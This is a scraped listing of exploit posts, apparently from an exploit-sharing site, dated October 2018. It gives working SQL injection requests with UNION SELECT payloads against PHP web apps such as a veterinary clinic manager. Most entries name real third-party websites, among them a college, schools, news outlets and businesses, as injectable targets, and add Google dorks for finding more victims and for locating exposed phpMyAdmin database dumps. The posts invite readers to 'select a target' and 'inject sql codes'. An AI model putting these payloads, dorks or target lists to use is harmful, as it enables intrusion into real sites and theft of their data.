PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:12:57 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1 GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:08:03 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2150 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  15. # Exploit Title: Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://vetclinic.sourceforge.io/ # Software Link: https://sourceforge.net/projects/vetclinic/files/latest/download # Version: 00.02 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/petmaint.php?editpetnum=[SQL] # # [PATH]/petmaint.php # .... #154 $editpetnum = ""; #155 #156 if(isset($_POST["editpetnum"])) { #157 $editpetnum = $_POST["editpetnum"]; #158 unset($_POST["editpetnum"]); #159 } #160 else if(isset($_GET["editpetnum"])) { #161 $editpetnum = $_GET["editpetnum"]; #162 unset($_GET["editpetnum"]); #163 } # .... GET /[PATH]/petmaint.php?editpetnum=-0x496873616e2053656e63616e+UniOn++SeLect++0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2cCONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()))%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:18:01 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Set-Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://localhost/[PATH]/procmaint.php?proccode=[SQL] # # [PATH]/procmaint.php # .... #28 require_once "includes/common.inc"; #29 $emplnumber = $_SESSION['employeenumber']; #30 $display = "ProcMaint:".$emplnumber; #31 if(isset($_GET["proccode"])) { #32 $proccode = $_GET["proccode"]; #33 } else { #34 $proccode = ""; #35 } #36 if ($proccode == "") #37 { # .... GET /[PATH]/procmaint.php?proccode=%27%27%27%27+unioN+selECt++nuLL,nuLL,nuLL,conCAT(0x496873616e2053656e63616e),nuLL--+Efe HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=8dts9gt545rgn1f5i4pgn573a3 Connection: keep-alive HTTP/1.1 200 OK Date: Thu, 25 Oct 2018 22:22:33 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2697 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  16. |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] title : powered by drupal www.archivio.fuorisalone.it sql injection |[+] dork : intext: powered by drupal inurl:"php id=" |[+] author : anonysec |[+] our web : www.anonysec.org |[+] vendor : www.archivio.fuorisalone.it |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] search the google dork ==> intext: powered by drupal inurl:"php id=" |[+] select a target |[+] inject sql codes |[+] demo : http://www.coolqsl.com/galeria.php?ID=123&wersja_languageowa=2' (sql injection) http://archivio.fuorisalone.it/2010/blog_article.php?id=143' (sql injection) https://www.smkn6batam.sch.id/index.php?id=berita&kode=35' (sql injection) http://csmlab.hanyang.ac.kr/bbs/zboard.php?id=gallery&no=5' (sql injection) http://www.akimbo.ca/akimblog/index.php?id=162' (sql injection) http://hackerpublicradio.org/series.php?id=0' (sql injection) |[+] discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx ==> ReZa Cloner , Rednofozi , Sheikh shahin and all bax from anonysec team.... http://www.exploit4arab.org/exploits/2196
  17. |--------------------------------------------------------------| |[+] Exploit Title:php MyAdmin SQL Dump database Vulnerability |[+] Date:25/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: https://www.cacti.net |[+] dork : filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump") |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] MY site :anonysec.org |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| Exploit :info Google Search filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump") |--------------------------------------------------------------| DEMO https://www.cacti.net/downloads/docs/sql/phpMyAdmin.sql https://camdial.org/~ping/cturk-task4/docs/cturk20110125.sql http://www.americandiscovery.net/coordinatorsonly/Database/database.sql About 11.900 results |--------------------------------------------------------------| **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2194
  18. |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title: designed by webinnovation.net SQL Injection Vulnerability |[+] Date:24/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: www.webinnovation.net |[+] dork: intext:site designed by webinnovation.net inurl:.php?id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection Vulnerability |[+] Severity Level :Med. |[+] Exploit :info -------------->.php ***************************************************************| |[+] dork: intext:site designed by webinnovation.net inurl:.php?id= ################################################################ ----------------------------------------------------------------------------------- SQL Injection Vulnerability http://www.zafood.net/page.php?id=16 https://magaccountants.com/page.php?id=5 https://www.danpakfoods.com/newsdetails.php?id=1%27 http://masoodaziz.com/page.php?id=18 The End , Enjoy Of Hacking ...! ---------------------------------------------------------------------------------- |--------------------------------------------------------------| my name is Inj3ct0r Red Hat's hackers http://www.exploit4arab.org/exploits/2191
  19. |[+] Exploit Title:Разработка сайтов. Разработка и создание сайтов - RayStudio SQL Injection Vulnerability |[+] Date:24/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: www.raystudio.ru |[+] dork: intext:© 2001-2016 RayStudio.ru inurl:.php?id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection Vulnerability |[+] Severity Level :Med. |[+] Exploit :info -------------->.php ***************************************************************| |[+] dork:intext:© 2001-2016 RayStudio.ru inurl:.php?id= ################################################################ ----------------------------------------------------------------------------------- SQL Injection Vulnerability http://www.raystudio.ru/main.php?id=114 http://www.raystudio.ru/main.php?id=387 http://www.raystudio.ru/main.php?id=1038 The End , Enjoy Of Hacking ...! ---------------------------------------------------------------------------------- |--------------------------------------------------------------| my name is Inj3ct0r Red Hat's hackers ********************************************************************** https://t.me/RHGInj3ct0r Discovered by : Rednofozi RGH Digital Security Team Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2190
  20. |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title: Copyright © 2018 Chung Chi College. All Rights Reserved SQL Injection Vulnerability |[+] Date 22/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:http://www.news.ccc.cuhk.edu.hk |[+] dork: intext:Copyright © 2018 Chung Chi College. All Rights Reserved inurl:.php?nid= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->.php?nid= ***************************************************************| Google Search intext:Copyright © 2018 Chung Chi College. All Rights Reserved inurl:.php?nid= SQL Injection Vulnerability --------------> .php?nid= ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability http://m.targets.com.tw/en/m/artist/more.php?nid=104 http://www.news.ccc.cuhk.edu.hk/wn/en/content.php?nid=7 **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2188
  21. |[+] Exploit Title: Web Design in Victoria BC | WordPress Websites | IdeaZone.ca SQL Injection Vulnerability |[+] Date:22/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://www.ideazone.ca/ |[+] dork: intext:© Copyright - IdeaZone.ca inurl:.php?Id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->.php?id= ***************************************************************| Google Search intext:Custom Web Development & WebSite Design by Dizyn inurl:.php?Id= You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL Injection Vulnerability --------------> .php?id= ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability http://www.infotechvi.com/exit.php?companyID=2027 **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2187
  22. |[+] Exploit Title: Copyright © 2018 Chung Chi College. All Rights Reserved SQL Injection Vulnerability |[+] Date:20/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:http://www.news.ccc.cuhk.edu.hk |[+] dork: intext:Copyright © 2018 Chung Chi College. All Rights Reserved inurl:.php?nid= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->.php?nid= ***************************************************************| Google Search inurl:notices.php?nid= SQL Injection Vulnerability --------------> .php?nid= ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability http://m.targets.com.tw/en/m/artist/more.php?nid=104 http://www.news.ccc.cuhk.edu.hk/wn/en/content.php?nid=7 **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2182
  23. |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title: Powered by: SEO Training Courses Lahore RealWebIdea SQL Injection Vulnerability |[+] Date:19/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://myscs.org |[+] dork: intext:Powered by: SEO Training Courses Lahore RealWebIdea inurl:detail.php?id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->detail.php?id= ***************************************************************| Google Search intext:Powered by: SEO Training Courses Lahore RealWebIdea inurl:detail.php?id= You have an error in File : /var/www/vhosts/myscs.org/httpdocs/lib/connectionMgr.php at Line Number : 135 Function Name : getSingleRow Query : SELECT * FROM myscs_db.myscs_sub_links where status = 'active' AND id = '38'' Error String : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''38''' at line 1 SQL Injection Vulnerability --------------> detail.php ***************************************************************| RHG Team hackers |--------------------------------------------------------------| SQL Injection Vulnerability http://myscs.org/study-abroad-detail.php?id=38%27 http://myscs.org/study-abroad-detail.php?id=63%27 **************************************************************** Discovered by : Inj3ct0r | Rednofozi RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2181
  24. |--------------------------------------------------------------| |--------------------------------------------------------------| |[+] Exploit Title: МБОУДО СДЮСШОР № 7 «Акробат» SQL Injection Vulnerability |[+] Date:18/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: http://www.acrobat-tlt.ru |[+] dork: intext:МБОУДОД СДЮСШОР № 7 «Акробат» © 2018 г. inurl:trainers.php?id= |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : inj3ct0r Anonysec hackers iran team |[+] Vulnerability Type :SQL Injection |[+] Severity Level :Med. |[+] Exploit :info SQL Injection Vulnerability -------------->trainers.php ***************************************************************| Google Search intext:МБОУДОД СДЮСШОР № 7 «Акробат» © 2018 г. SQL Injection Vulnerability -------------->trainers.php ***************************************************************| RHG Team hackers You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''3''' at line 1 |--------------------------------------------------------------| SQL Injection Vulnerability http://www.acrobat-tlt.ru/trainers.php?id=3%27 http://ureka-edu.com.sg/trainers.php?id=16 https://www.thecabincrossfit.com/our-trainers.php/our-trainers-details.php?id=25 https://horseracebase.com/trainers.php?id=5 http://www.perfectfit24-7.com/trainers.php?id=1 About 14.200 results **************************************************************** Discovered by : Inj3ct0r |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2176
  25. [+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] title : intext:"مدعوم من عبد الله" arabic sql injection |[+] dork : intext:مدعوم من عبد الله inurl:"php id=" |[+] vendor : www.rumonline.net |[+] author : AnonySec |[+] our web : www.anonysec.org |[+] risk : high |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] |[+] search the google dork ==> intext:مدعوم من عبد الله inurl:"php id=" |[+] select a target |[+] inject sql codes |[+] demo : http://www.rumonline.net/print.php?id=187710' (sql injection) http://www.rumonline.net/print.php?id=368588' (sql injection) http://www.jfranews.com.jo/post.php?id=3358' (sql injection) http://www.faceiraq.com/inews.php?id=1443742' (sql injection) |[+] Discovered by ==> Moeein Seven | www.moeein.ir |[+] tnx==> ReZa Cloner , RedNofozi , SheikhShahin and all bax from anonysec team.... http://www.exploit4arab.org/exploits/2183
×
×
  • جدید...